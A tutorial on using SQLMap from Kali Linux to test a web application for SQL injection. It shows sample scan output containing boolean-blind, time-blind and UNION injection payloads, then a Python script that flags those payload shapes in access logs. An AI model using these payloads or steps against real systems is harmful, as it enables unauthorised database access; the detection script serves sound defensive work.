SQLMap: Unleashing the Power of SQL Injection Testing with SQLMap



What is SQLMap?

SQLMap is a powerful tool designed to detect and exploit SQL injection vulnerabilities in web applications. Developed in Python, SQLMap is available as an open-source tool and is well-regarded for its extensive range of features and capabilities. It supports various database management systems (DBMS) and can automatically identify vulnerabilities within a target web application, enabling security professionals to rectify them proactively.

If you are using Kali Linux, SQLMap comes pre-installed. There is nothing to locate: open a terminal and run the tool directly from the command line by typing "sqlmap".


For this example, let's assume that you have identified a web application with the IP address 192.168.10.10 and suspect that it might be vulnerable to SQL injection. To test this hypothesis using SQLMap, follow these steps:



Step 1: Launch SQLMap:
Open a terminal in Kali Linux and type the following command to start SQLMap.

sqlmap



Step 2: Specify the Target:
Next, specify the target URL (or IP address) of the web application you want to test with the -u option. In this case, we'll use the application hosted at the IP address 192.168.10.10, passing the injectable page and its id parameter in the URL.


sqlmap -u http://192.168.10.10/product.php?id=1




Step 3: Start the Scan: 
Once you've specified the target, SQLMap will automatically begin scanning the application for potential SQL injection vulnerabilities. The tool will perform a series of tests and checks to identify any exploitable points.

Step 4: Review the Results:
After completing the scan, SQLMap will display the results of its assessment. Pay close attention to any vulnerabilities identified, as well as the risk level associated with each finding.

[INFO] testing connection to the target URL
[INFO] analyzing target URL
[INFO] testing if the target URL is vulnerable to SQL injection
[INFO] the target URL is vulnerable to SQL injection (parameter: id)

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://example.com/product.php?id=1' AND 5678=5678-- -

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://example.com/product.php?id=1' AND (SELECT 7737 FROM (SELECT(SLEEP(5)))dQqy)-- -

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 to 20 columns
    Payload: http://example.com/product.php?id=1' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- -

[INFO] fetched data from the target URL
Database management system:
    MySQL
    Version: 5.7.32

[INFO] total database(s) retrieved: 1
[INFO] retrieved data from database "example_db":
    Table: products
    [1 entry]
        +-----+---------------+-------------+
        | id  |   product     |   price     |
        +-----+---------------+-------------+
        | 1   |  Product A    |  $25.99     |
        +-----+---------------+-------------+


Step 5: Exploit the Vulnerabilities:
If SQLMap detects any SQL injection vulnerabilities, you have the option to exploit them directly from the tool.
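The scan output above shows the three techniques SQLMap tried against the id parameter: boolean-based blind (AND 5678=5678), time-based blind (SLEEP(5)) and a UNION query. Each of those leaves a recognisable trace in the web server's access log, which is what a defender sees while such a test runs. The following Python script is an added example, not part of the original post and not SQLMap's own code: it parses Common Log Format lines, URL-decodes the query string and flags requests matching those three payload shapes. The log lines, IP addresses and timestamps are constructed for the example.

```python
"""Flag SQLMap-style injection probes in web server access logs (added example)."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample traffic in Common Log Format; the client IP and
# timestamps are made up. Lines 2-4 carry the three payload shapes that
# appeared in the sqlmap output above, percent-encoded as a browser or
# tool would send them.
SAMPLE_LOG = """\
192.168.10.50 - - [10/Oct/2023:13:55:36 +0000] "GET /product.php?id=1 HTTP/1.1" 200 512
192.168.10.50 - - [10/Oct/2023:13:55:37 +0000] "GET /product.php?id=1%27%20AND%205678%3D5678--%20- HTTP/1.1" 200 512
192.168.10.50 - - [10/Oct/2023:13:55:38 +0000] "GET /product.php?id=1%27%20AND%20%28SELECT%207737%20FROM%20%28SELECT%28SLEEP%285%29%29%29dQqy%29--%20- HTTP/1.1" 200 512
192.168.10.50 - - [10/Oct/2023:13:55:39 +0000] "GET /product.php?id=1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20- HTTP/1.1" 200 512
192.168.10.50 - - [10/Oct/2023:13:55:40 +0000] "GET /product.php?id=2 HTTP/1.1" 200 498
"""

# One detection rule per technique reported by sqlmap above.
# boolean-based blind: "AND <n>=<n>" with the same number on both sides
# time-based blind:    a call to a DBMS sleep/delay function
# UNION query:         "UNION [ALL] SELECT"
RULES = {
    "boolean-based blind": re.compile(r"\bAND\b\s+(\d+)\s*=\s*\1\b", re.I),
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\b(\s+ALL)?\s+SELECT\b", re.I),
}

# Common Log Format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(path):
    """Return the technique names whose rule matches any decoded query value.

    parse_qsl percent-decodes each value once; a second unquote_plus pass
    catches double-encoded payloads (a common filter-evasion trick).
    """
    hits = []
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        decoded = unquote_plus(value)
        for name, pattern in RULES.items():
            if pattern.search(decoded) and name not in hits:
                hits.append(name)
    return hits


def scan_log(text):
    """Return (ip, timestamp, path, techniques) for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        techniques = classify_request(m["path"])
        if techniques:
            findings.append((m["ip"], m["ts"], m["path"], techniques))
    return findings


if __name__ == "__main__":
    for ip, ts, path, techniques in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {', '.join(techniques)}: {path}")
```

Run against the constructed log, the script flags the three probe lines and leaves the two ordinary requests alone. In a real deployment the same rules would be applied to a live log feed, and several distinct technique hits from one client within a few seconds is a strong signal that an automated scanner rather than a manual tester is at work.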



